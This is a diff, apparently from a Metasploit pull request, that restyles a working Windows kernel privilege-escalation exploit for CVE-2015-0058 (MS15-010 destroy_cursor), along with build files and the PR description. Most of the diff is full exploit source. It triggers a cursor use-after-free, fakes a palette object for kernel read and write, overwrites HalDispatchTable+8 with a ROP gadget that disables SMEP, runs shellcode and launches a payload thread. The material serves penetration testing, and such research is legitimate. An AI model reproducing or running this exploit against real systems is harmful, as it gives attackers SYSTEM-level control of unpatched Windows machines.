-    dprintf("[*] using offset: %lx \n", pInfo->offset);
+	xxNtQuerySystemInformation(SystemModuleInformation, &moduleInfo, sizeof(moduleInfo), NULL);
 
-    hHeap = GetProcessHeap();
-
-    palentries = (PALETTEENTRY *)HeapAlloc(hHeap,
-                                           HEAP_ZERO_MEMORY,
-                                           0x20);
-
-    fakepalette = (FAKEPALETTE *)HeapAlloc(hHeap,
-                                           HEAP_ZERO_MEMORY,
-                                           0x42c);
-
-    // Set the flags that we can delete the freed palette later on (cleanup)
-    fakepalette->flags = 0x501;
-    // By setting numEntries to 0xe6 we can later distinguish between the normal palettes 
-    // and our fakepalette
-    fakepalette->numEntries = 0xe6;
-
-    shellcode = (BYTE *)VirtualAlloc((LPVOID)0x00000000dead0000,  // max one DWORD long
-                                     0x100,
-                                     MEM_COMMIT | MEM_RESERVE,
-                                     PAGE_EXECUTE_READWRITE);
-
-    xxNtQuerySystemInformation = (xxxNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
-
-    xxNtQuerySystemInformation(SystemModuleInformation,
-                               &ModuleInfo,
-                               sizeof(ModuleInfo),
-                               NULL);
-
-    // Get HalDispatchTable
-    KernelHandle        = LoadLibraryA(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
-    kernelBase            = (QWORD)ModuleInfo.Modules[0].ImageBase;
-    HalDispatchTable    = (QWORD)GetProcAddress(KernelHandle, "HalDispatchTable");
-    HalDispatchTable    = HalDispatchTable - (QWORD)KernelHandle + (QWORD)ModuleInfo.Modules[0].ImageBase;
-    DTableQueryInterval = HalDispatchTable + 8;
-
-    dprintf("[*] HalDispatchTable+8 @%llx \n", DTableQueryInterval);
-
-    // Create Cursors
-    hCursorA = CreateCursor(NULL,
-                            1,
-                            1,
-                            4,
-                            4,
-                            AndMask,
-                            XORMask);
-
-    hCursorB = CreateCursor(NULL,
-                            1,
-                            1,
-                            4,
-                            4,
-                            AndMask,
-                            XORMask);
-
-    dprintf("[*] Leaking address... \n");
-
-    targetPalette = info_leak();
-
-    if (!targetPalette) {
-        dprintf("[!] Exploit failed: couldn't leak palette, try it again \n");
-        return;
-    }
-
-    dprintf("[*] Palette was created @%llx \n", targetPalette);
-
-    VirtualProtect(SyscallCode, sizeof(SyscallCode), PAGE_EXECUTE_READWRITE, &OldProtect);
-
-    memcpy(&SystemCall, &SyscallCodePtr, sizeof(PVOID));
-
-    dprintf("[*] Linking cursors... \n");
-
-    // Link the cursors
-    linked = CallService(__NR_NtUserLinkDpiCursor,
-                         SYSCALL_ARG(hCursorA),
-                         SYSCALL_ARG(hCursorB),
-                         SYSCALL_ARG(0x30),
-                         0,0,0,0,0);
-
-
-    if (linked != FALSE) {
-        dprintf("[*] Success \n");
-    }
-    else {
-        dprintf("[!] Exploit failed: couldn't link cursors \n");
-        return;
-    }
-
-    hExe = GetModuleHandle(NULL);
-
-    // Register the main window class. 
-    wcx.cbSize          = sizeof(wcx);
-    wcx.style           = CS_HREDRAW | CS_VREDRAW;
-    wcx.lpfnWndProc     = (WNDPROC)GestureProc;
-    wcx.cbClsExtra      = 0;
-    wcx.cbWndExtra      = 0;
-    wcx.hInstance       = hExe;
-    wcx.hIcon           = NULL;
-    wcx.hCursor         = NULL;
-    wcx.hbrBackground   = NULL;
-    wcx.lpszMenuName    = "MainMenu";
-    wcx.lpszClassName   = "MainWClass";
-    wcx.hIconSm         = NULL;
-
-    if (!RegisterClassEx(&wcx)) {
-        dprintf("[!] Exploit failed: couldn't register window class \n");
-        return;
-    }
-
-    hWnd = CreateWindow("MainWClass",        // name of window class 
-                        "Sample",            // title-bar string 
-                        WS_OVERLAPPEDWINDOW, // top-level window 
-                        CW_USEDEFAULT,       // default horizontal position 
-                        CW_USEDEFAULT,       // default vertical position 
-                        CW_USEDEFAULT,       // default width 
-                        CW_USEDEFAULT,       // default height 
-                        (HWND)NULL,          // no owner window 
-                        (HMENU)NULL,         // use class menu 
-                        hExe,                 // handle to application instance 
-                        (LPVOID)NULL);       // no window-creation data 
-
-    gestureInfo = (EXTGESTUREINFO*)HeapAlloc(hHeap,
-                                             HEAP_ZERO_MEMORY,
-                                             0x90);
-
-    gestureInfo->cbSize         = sizeof(GESTUREINFO);
-    gestureInfo->cbExtraArgs    = 0x40;
-    gestureInfo->hwndTarget     = hWnd;
-    gestureInfo->dwFlags        = 1;
-    gestureInfo->dwID           = 0;
-    gestureInfo->ptsLocation.x  = 0x0001;
-    gestureInfo->ptsLocation.y  = 0x0002;
-    gestureInfo->dwInstanceID   = 0xdeadbeef;
-    gestureInfo->arbitraryFree  = targetPalette;
-    gestureInfo->ulArguments    = 1;
-
-    fakepalette->SelfRefPtrLow       = (DWORD)targetPalette;
-    fakepalette->SelfRefPtrHigh      = (DWORD)(targetPalette >> 32);
-    // This is were we will write and read
-    fakepalette->PalEntriesPtrLow    = (DWORD)DTableQueryInterval;
-    fakepalette->PalEntriesPtrHigh   = (DWORD)(DTableQueryInterval >> 32);
-
-    // No logs between this part, its time critical apparently
-    dprintf("[*] Freeing palette... \n");
-
-    // Destroy and free Cursor B
-    CallService(__NR_NtUserDestroyCursor,
-                SYSCALL_ARG(hCursorB),
-                SYSCALL_ARG(0x0),
-                0,0,0,0,0,0);
-
-    // Replace the freed Cursor with our gestureInfo
-    InjectGesture(hWnd, gestureInfo);
-
-    // Destroy Cursor A and free the target palette
-    CallService(__NR_NtUserDestroyCursor,
-                SYSCALL_ARG(hCursorA),
-                SYSCALL_ARG(0x0),
-                0,0,0,0,0,0);
-
-    FlushDeferredPool();
-
-    // Replace the freed palette with our fakepalette
-    for (i = 0; i < 32; i++) {
-
-        hMem = CallService(__NR_NtUserConvertMemHandle,
-                           SYSCALL_ARG(fakepalette),
-                           SYSCALL_ARG(0x418),
-                           0,0,0,0,0,0);
-    }
-
-    dprintf("[*] Replacing palette with fakepalette \n");
-
-    // Search in the previously allocated palettes for one that has it's numberEntries member
-    // set to 0xe6 (like in our fakepalette)
-    for (i = 0; i < 32; i++) {
-
-        found = GetPaletteEntries(palArray[i],
-                                  0xe5,
-                                  1,
-                                  &palentry);
-
-        // If we find one we have successfully replaced our target palette
-        if (found) {
-
-            dprintf("[*] Freed palette was successfully replaced \n");
-            // HPALETTE
-            freedPalette = palArray[i];
-            break;
-        }
-    }
-
-    if (freedPalette != NULL) {
-
-        // Leak the function address of nt!ArbAddReserved @ HalDispatchTable+18h to bypass ASLR
-        GetPaletteEntries(freedPalette,
-                          4,
-                          2,
-                          palentries);
-
-        ntArbAddReserved = *((QWORD *)palentries);
-
-        dprintf("[*] nt!ArbAddReserved@%llx \n", ntArbAddReserved);
-
-        GetPaletteEntries(freedPalette,
-                          0,
-                          2,
-                          palentries);
-
-        HaliQuerySystemInformation = *((QWORD *)palentries);
-
-        // Calculate the address of nt!KiConfigureDynamicProcessor+0x40 which will serve as our
-        // rop gadget to disable SMEP
-        // this offset varies between versions
-        rop_gadget = ntArbAddReserved - pInfo->offset;
-
-        /*
-            mov cr4, rax
-            add rsp, 28h
-            ret
-        */
-        
-
-        dprintf("[*] rop gadget@%llx \n", rop_gadget);
-        palentries = (LPPALETTEENTRY)&rop_gadget;
-
-        // Overwrite the NtQueryIntervalProfile pointer @ HalDispatchTable+8 with our rop gadget
-        SetPaletteEntries(freedPalette,
-                          0,
-                          2,
-                          palentries);
-
-        // Write the palette object address and it's handle to the shellcode
-        memcpy(&sc[63], &targetPalette, sizeof(QWORD));
-        memcpy(&sc[73], &freedPalette, sizeof(QWORD));
-
-        memcpy(shellcode, sc, sizeof(sc));
-
-        // Clean the stack with zeros
-        CallService(__NR_NtCreateTimer,
-                    SYSCALL_ARG(&timer),
-                    SYSCALL_ARG(0x1f0003),
-                    SYSCALL_ARG(0x0),
-                    SYSCALL_ARG(0x0),
-                    0,0,0,0);
-
-        dprintf("[*] executing shellcode! \n");
-
-        // Disable SMEP and execute shellcode !
-        CallService(__NR_NtQueryIntervalProfile,
-                    SYSCALL_ARG(shellcode),
-                    SYSCALL_ARG(&new_cr4),
-                    0,0,0,0,0,0);
-
-        palentries = (LPPALETTEENTRY)&HaliQuerySystemInformation;
-
-        // Restore the NtQueryIntervalProfile pointer
-        SetPaletteEntries(freedPalette,
-                          0,
-                          2,
-                          palentries);
-
-        // Delete the freed palette
-        DeleteObject(freedPalette);
-
-        // Delete the remaining palette handles
-        for (i = 0; i < 32; i++) {
-            DeleteObject(palArray[i]);
-        }
-
-        // If everything worked process should be privileged at this point
-        dprintf("[!] Executing payload... \n");
-        CreateThread(0, 0, execute_payload, pInfo->lpPayload, 0, NULL);
-    }
-    else {
-
-        dprintf("[!] Exploit failed: Could not find freed palette. \n");
-    }
-
-    return;
-    
+	// Get HalDispatchTable
+	hKernel = LoadLibraryA(moduleInfo.Modules[0].FullPathName + moduleInfo.Modules[0].OffsetToFileName);
+	pHalDispatchTable = (ULONG_PTR)GetProcAddress(hKernel, "HalDispatchTable");
+	pHalDispatchTable = pHalDispatchTable - (ULONG_PTR)hKernel + (ULONG_PTR)moduleInfo.Modules[0].ImageBase;
+	pDTableQueryInterval = pHalDispatchTable + 8;
+
+	dprintf("[*] HalDispatchTable+8 @%llx", pDTableQueryInterval);
+
+	// Create Cursors
+	hCursorA = CreateCursor(NULL, 1, 1, 4, 4, andMask, xorMask);
+
+	hCursorB = CreateCursor(NULL, 1, 1, 4, 4, andMask, xorMask);
+
+	dprintf("[*] Leaking address...");
+
+	pTargetPalette = info_leak();
+
+	if (!pTargetPalette)
+	{
+		dprintf("[!] Exploit failed: couldn't leak palette, try it again");
+		return;
+	}
+
+	dprintf("[*] Palette was created @%llx", pTargetPalette);
+
+	VirtualProtect(syscallCode, sizeof(syscallCode), PAGE_EXECUTE_READWRITE, &dwOldProtect);
+
+	memcpy(&SystemCall, &syscallCodePtr, sizeof(PVOID));
+
+	dprintf("[*] Linking cursors...");
+
+	// Link the cursors
+	BOOL bLinked = call_service(__NR_NtUserLinkDpiCursor, SYSCALL_ARG(hCursorA), SYSCALL_ARG(hCursorB),
+		SYSCALL_ARG(0x30), 0, 0, 0, 0, 0);
+
+	if (!bLinked)
+	{
+		dprintf("[!] Exploit failed: couldn't link cursors");
+		return;
+	}
+
+	dprintf("[*] Success");
+	hExe = GetModuleHandle(NULL);
+
+	// Register the main window class. 
+	wcx.cbSize = sizeof(wcx);
+	wcx.style = CS_HREDRAW | CS_VREDRAW;
+	wcx.lpfnWndProc = (WNDPROC)gesture_proc;
+	wcx.cbClsExtra = 0;
+	wcx.cbWndExtra = 0;
+	wcx.hInstance = hExe;
+	wcx.hIcon = NULL;
+	wcx.hCursor = NULL;
+	wcx.hbrBackground = NULL;
+	wcx.lpszMenuName = "MainMenu";
+	wcx.lpszClassName = "MainWClass";
+	wcx.hIconSm = NULL;
+
+	if (!RegisterClassEx(&wcx))
+	{
+		dprintf("[!] Exploit failed: couldn't register window class");
+		return;
+	}
+
+	HWND hWnd = CreateWindow("MainWClass", "Sample", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT,
+		CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, (HWND)NULL, (HMENU)NULL, hExe, (LPVOID)NULL);
+
+	PEXTGESTUREINFO pGestureInfo = (PEXTGESTUREINFO)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x90);
+
+	pGestureInfo->cbSize = sizeof(GESTUREINFO);
+	pGestureInfo->cbExtraArgs = 0x40;
+	pGestureInfo->hwndTarget = hWnd;
+	pGestureInfo->dwFlags = 1;
+	pGestureInfo->dwID = 0;
+	pGestureInfo->ptsLocation.x = 0x0001;
+	pGestureInfo->ptsLocation.y = 0x0002;
+	pGestureInfo->dwInstanceID = 0xdeadbeef;
+	pGestureInfo->arbitraryFree = pTargetPalette;
+	pGestureInfo->ulArguments = 1;
+
+	fakepalette->SelfRefPtrLow = (DWORD)pTargetPalette;
+	fakepalette->SelfRefPtrHigh = (DWORD)(pTargetPalette >> 32);
+	// This is were we will write and read
+	fakepalette->PalEntriesPtrLow = (DWORD)pDTableQueryInterval;
+	fakepalette->PalEntriesPtrHigh = (DWORD)(pDTableQueryInterval >> 32);
+
+	// No logs between this part, its time critical apparently
+	dprintf("[*] Freeing palette...");
+
+	// Destroy and free Cursor B
+	call_service(__NR_NtUserDestroyCursor, SYSCALL_ARG(hCursorB), SYSCALL_ARG(0x0),
+		0, 0, 0, 0, 0, 0);
+
+	// Replace the freed Cursor with our gestureInfo
+	inject_gesture(hWnd, pGestureInfo);
+
+	// Destroy Cursor A and free the target palette
+	call_service(__NR_NtUserDestroyCursor, SYSCALL_ARG(hCursorA), SYSCALL_ARG(0x0),
+		0, 0, 0, 0, 0, 0);
+
+	flush_deferred_pool();
+
+	// Replace the freed palette with our fakepalette
+	for (i = 0; i < 32; i++)
+	{
+		hMem = call_service(__NR_NtUserConvertMemHandle, SYSCALL_ARG(fakepalette),
+			SYSCALL_ARG(0x418), 0, 0, 0, 0, 0, 0);
+	}
+
+	dprintf("[*] Replacing palette with fakepalette");
+
+	// Search in the previously allocated palettes for one that has it's numberEntries member
+	// set to 0xe6 (like in our fakepalette)
+	PALETTEENTRY palEntry;
+
+	for (i = 0; i < 32; i++)
+	{
+		found = GetPaletteEntries(palArray[i], 0xe5, 1, &palEntry);
+
+		// If we find one we have successfully replaced our target palette
+		if (found)
+		{
+			dprintf("[*] Freed palette was successfully replaced");
+			hFreedPalette = palArray[i];
+			break;
+		}
+	}
+
+	if (hFreedPalette != NULL)
+	{
+		// Leak the function address of nt!ArbAddReserved @ HalDispatchTable+18h to bypass ASLR
+		GetPaletteEntries(hFreedPalette, 4, 2, palEntries);
+
+		ULONG_PTR ntArbAddReserved = *((PULONG_PTR)palEntries);
+
+		dprintf("[*] nt!ArbAddReserved@%llx", ntArbAddReserved);
+
+		GetPaletteEntries(hFreedPalette, 0, 2, palEntries);
+
+		ULONG_PTR haliQuerySystemInformation = *((PULONG_PTR)palEntries);
+
+		// Calculate the address of nt!KiConfigureDynamicProcessor+0x40 which will serve as our
+		// rop gadget to disable SMEP
+		// this offset varies between versions
+		rop_gadget = ntArbAddReserved - pInfo->dwOffset;
+
+		/*
+			mov cr4, rax
+			add rsp, 28h
+			ret
+		*/
+		dprintf("[*] rop gadget@%llx", rop_gadget);
+		palEntries = (LPPALETTEENTRY)&rop_gadget;
+
+		// Overwrite the NtQueryIntervalProfile pointer @ HalDispatchTable+8 with our rop gadget
+		SetPaletteEntries(hFreedPalette, 0, 2, palEntries);
+
+		// Write the palette object address and it's handle to the shellcode
+		memcpy(&privEscCode[63], &pTargetPalette, sizeof(ULONG_PTR));
+		memcpy(&privEscCode[73], &hFreedPalette, sizeof(ULONG_PTR));
+
+		memcpy(pShellcode, privEscCode, sizeof(privEscCode));
+
+		// Clean the stack with zeros
+		call_service(__NR_NtCreateTimer, SYSCALL_ARG(&timer), SYSCALL_ARG(0x1f0003),
+			SYSCALL_ARG(0x0), SYSCALL_ARG(0x0), 0, 0, 0, 0);
+
+		dprintf("[*] executing shellcode!");
+
+		// Disable SMEP and execute shellcode !
+		DWORD dwNewRc4 = 0x000406f8;
+		call_service(__NR_NtQueryIntervalProfile, SYSCALL_ARG(pShellcode), SYSCALL_ARG(&dwNewRc4),
+			0, 0, 0, 0, 0, 0);
+
+		palEntries = (LPPALETTEENTRY)&haliQuerySystemInformation;
+
+		// Restore the NtQueryIntervalProfile pointer
+		SetPaletteEntries(hFreedPalette, 0, 2, palEntries);
+
+		// Delete the freed palette
+		DeleteObject(hFreedPalette);
+
+		// Delete the remaining palette handles
+		for (i = 0; i < 32; i++)
+		{
+			DeleteObject(palArray[i]);
+		}
+
+		// If everything worked process should be privileged at this point
+		dprintf("[!] Executing payload...");
+		CreateThread(0, 0, execute_payload, pInfo->lpPayload, 0, NULL);
+	}
+	else
+	{
+		dprintf("[!] Exploit failed: Could not find freed palette.");
+	}
 }
 
 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
 {
-    BOOL bReturnValue = TRUE;
-    switch (dwReason)
-    {
-    case DLL_QUERY_HMODULE:
-        hAppInstance = hinstDLL;
-        if (lpReserved != NULL)
-        {
-            *(HMODULE *)lpReserved = hAppInstance;
-        }
-        break;
-    case DLL_PROCESS_ATTACH:
-        hAppInstance = hinstDLL;
-        link_and_destroy(lpReserved);
-        break;
-    case DLL_PROCESS_DETACH:
-    case DLL_THREAD_ATTACH:
-    case DLL_THREAD_DETACH:
-        break;
-    }
-    return bReturnValue;
+	BOOL bReturnValue = TRUE;
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		hAppInstance = hinstDLL;
+		if (lpReserved != NULL)
+		{
+			*(HMODULE *)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		link_and_destroy(lpReserved);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
 }

--- a/external/source/exploits/cve-2015-0058/cve-2015-0058/cve-2015-0058.c
+++ b/external/source/exploits/cve-2015-0058/cve-2015-0058/cve-2015-0058.c
@@ -341,7 +341,7 @@ void link_and_destroy(LPVOID info)
 
 	WNDCLASSEX wcx;
 
-	ULONG_PTR rop_gadget = 0;
+	ULONG_PTR pRopGadget = 0;
 
 
 	ULONG i = 0;
@@ -368,7 +368,7 @@ void link_and_destroy(LPVOID info)
 
 	hHeap = GetProcessHeap();
 
-	LPPALETTEENTRY palEntries = (LPPALETTEENTRY)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x20);
+	LPPALETTEENTRY pPalEntries = (LPPALETTEENTRY)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x20);
 
 	PFAKEPALETTE fakepalette = (PFAKEPALETTE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x42c);
 
@@ -516,31 +516,31 @@ void link_and_destroy(LPVOID info)
 	if (hFreedPalette != NULL)
 	{
 		// Leak the function address of nt!ArbAddReserved @ HalDispatchTable+18h to bypass ASLR
-		GetPaletteEntries(hFreedPalette, 4, 2, palEntries);
+		GetPaletteEntries(hFreedPalette, 4, 2, pPalEntries);
 
-		ULONG_PTR ntArbAddReserved = *((PULONG_PTR)palEntries);
+		ULONG_PTR ntArbAddReserved = *((PULONG_PTR)pPalEntries);
 
 		dprintf("[*] nt!ArbAddReserved@%llx", ntArbAddReserved);
 
-		GetPaletteEntries(hFreedPalette, 0, 2, palEntries);
+		GetPaletteEntries(hFreedPalette, 0, 2, pPalEntries);
 
-		ULONG_PTR haliQuerySystemInformation = *((PULONG_PTR)palEntries);
+		ULONG_PTR haliQuerySystemInformation = *((PULONG_PTR)pPalEntries);
 
 		// Calculate the address of nt!KiConfigureDynamicProcessor+0x40 which will serve as our
 		// rop gadget to disable SMEP
 		// this offset varies between versions
-		rop_gadget = ntArbAddReserved - pInfo->dwOffset;
+		pRopGadget = ntArbAddReserved - pInfo->dwOffset;
 
 		/*
 			mov cr4, rax
 			add rsp, 28h
 			ret
 		*/
-		dprintf("[*] rop gadget@%llx", rop_gadget);
-		palEntries = (LPPALETTEENTRY)&rop_gadget;
+		dprintf("[*] rop gadget@%llx", pRopGadget);
+		pPalEntries = (LPPALETTEENTRY)&pRopGadget;
 
 		// Overwrite the NtQueryIntervalProfile pointer @ HalDispatchTable+8 with our rop gadget
-		SetPaletteEntries(hFreedPalette, 0, 2, palEntries);
+		SetPaletteEntries(hFreedPalette, 0, 2, pPalEntries);
 
 		// Write the palette object address and it's handle to the shellcode
 		memcpy(&privEscCode[63], &pTargetPalette, sizeof(ULONG_PTR));
@@ -559,10 +559,10 @@ void link_and_destroy(LPVOID info)
 		call_service(__NR_NtQueryIntervalProfile, SYSCALL_ARG(pShellcode), SYSCALL_ARG(&dwNewRc4),
 			0, 0, 0, 0, 0, 0);
 
-		palEntries = (LPPALETTEENTRY)&haliQuerySystemInformation;
+		pPalEntries = (LPPALETTEENTRY)&haliQuerySystemInformation;
 
 		// Restore the NtQueryIntervalProfile pointer
-		SetPaletteEntries(hFreedPalette, 0, 2, palEntries);
+		SetPaletteEntries(hFreedPalette, 0, 2, pPalEntries);
 
 		// Delete the freed palette
 		DeleteObject(hFreedPalette);

--- a/external/source/exploits/cve-2015-0058/cve-2015-0058/cve-2015-0058.vcxproj
+++ b/external/source/exploits/cve-2015-0058/cve-2015-0058/cve-2015-0058.vcxproj
@@ -19,7 +19,7 @@
     </ProjectConfiguration>
   </ItemGroup>
   <PropertyGroup Label="Globals">
-    <ProjectGuid>{E80F11CD-6698-492F-B4B0-1A2348A24BB0}</ProjectGuid>
+    <ProjectGuid>{9A9975E4-66AA-4FA0-8099-1E1BA7D1BA2F}</ProjectGuid>
     <RootNamespace>cve-2015-0058</RootNamespace>
     <Keyword>Win32Proj</Keyword>
     <ProjectName>cve-2015-0058</ProjectName>

--- a/external/source/exploits/cve-2015-0058/cve-2015-0058/cve-2015-0058.vcxproj
+++ b/external/source/exploits/cve-2015-0058/cve-2015-0058/cve-2015-0058.vcxproj
@@ -70,7 +70,7 @@
     <ClCompile>
       <Optimization>Disabled</Optimization>
       <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2015_0058_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <MinimalRebuild>true</MinimalRebuild>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
@@ -102,7 +102,7 @@ exit 0</Command>
     <ClCompile>
       <Optimization>Disabled</Optimization>
       <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2015_0058_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
       <PrecompiledHeader>
@@ -134,7 +134,7 @@ exit 0</Command>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <IntrinsicFunctions>false</IntrinsicFunctions>
       <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2015_0058_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
       <FunctionLevelLinking>false</FunctionLevelLinking>
@@ -157,7 +157,7 @@ exit 0</Command>
       <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
       <GenerateDebugInformation>false</GenerateDebugInformation>
       <GenerateMapFile>true</GenerateMapFile>
-      <MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
+      <MapFileName>$(OutDir)\cve-2015-0058.map</MapFileName>
       <SubSystem>Windows</SubSystem>
       <OptimizeReferences>
       </OptimizeReferences>
@@ -166,7 +166,7 @@ exit 0</Command>
       <RandomizedBaseAddress>false</RandomizedBaseAddress>
       <DataExecutionPrevention>
       </DataExecutionPrevention>
-      <ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
+      <ImportLibrary>$(OutDir)\cve-2015-0058.lib</ImportLibrary>
       <TargetMachine>MachineX86</TargetMachine>
       <Profile>false</Profile>
       <ModuleDefinitionFile>
@@ -175,10 +175,10 @@ exit 0</Command>
     </Link>
     <PostBuildEvent>
       <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
-IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
-    mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2015-0058\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2015-0058\"
 :COPY
-copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2015-0058\"</Command>
     </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@@ -187,7 +187,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <IntrinsicFunctions>false</IntrinsicFunctions>
       <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2015_0058_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
       <FunctionLevelLinking>false</FunctionLevelLinking>
@@ -210,7 +210,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4
       <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
       <GenerateDebugInformation>false</GenerateDebugInformation>
       <GenerateMapFile>true</GenerateMapFile>
-      <MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
+      <MapFileName>$(OutDir)\cve-2015-0058.map</MapFileName>
       <SubSystem>Windows</SubSystem>
       <OptimizeReferences>
       </OptimizeReferences>
@@ -219,7 +219,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4
       <RandomizedBaseAddress>false</RandomizedBaseAddress>
       <DataExecutionPrevention>
       </DataExecutionPrevention>
-      <ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
+      <ImportLibrary>$(OutDir)\cve-2015-0058.lib</ImportLibrary>
       <Profile>false</Profile>
       <ModuleDefinitionFile>
       </ModuleDefinitionFile>

--- a/external/source/exploits/cve-2015-0058/make.msbuild
+++ b/external/source/exploits/cve-2015-0058/make.msbuild
@@ -6,6 +6,10 @@
 
   <Target Name="all" DependsOnTargets="x64" />
 
+  <Target Name="x86">
+    <Message Text="Building CVE-2015-0058 destroy_cursor does not have an x86 version" />
+  </Target>
+
   <Target Name="x64">
     <Message Text="Building CVE-2015-0058 destroy_cursor x64 Release version" />
     <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>

--- a/modules/exploits/windows/local/ms15_010_destroy_cursor.rb
+++ b/modules/exploits/windows/local/ms15_010_destroy_cursor.rb
@@ -92,9 +92,7 @@ class Metasploit3 < Msf::Exploit::Local
     return Exploit::CheckCode::Safe if build == 9200
 
     if [9600].include?(build)
-
       case revision
-
       when 17353
         @rop_offset = 0x198534
       when 17393


### PR DESCRIPTION
This PR contains a bunch of tedious code changes that are rather nitpicky, and hence I didn't want to force you to do it all yourself!

The changes revolve around the following:
- Changing of project and solution GUIDs to avoid collisions with old modules.
- Removal of references to the track popup CVE in project settings.
- Naming conventions, tabs vs spaces, braces, etc.
- Initialisation of variables at the point of first use.
- Use of `const` where possible.
- Using `ULONG_PTR` instead of `__int64` and `QWORD`.
- Adjustment of projects so that x86 is completely removed.
- Adjustment of makefile so that a message is shown that x86 isn't a valid option.

When testing the initial PR I was seeing fairly consistent bluescreens when running the module. Sometimes it'd happen when the Meterpreter session was removed, and other times it would crash when trying to rerun the module (all on Windows 8.1). For some reason, since adjusting the code for style, etc. these crashes seem to have disappeared. I'm not sure why!

Please review the changes below and let me know what you think. Thanks again for the great submission!
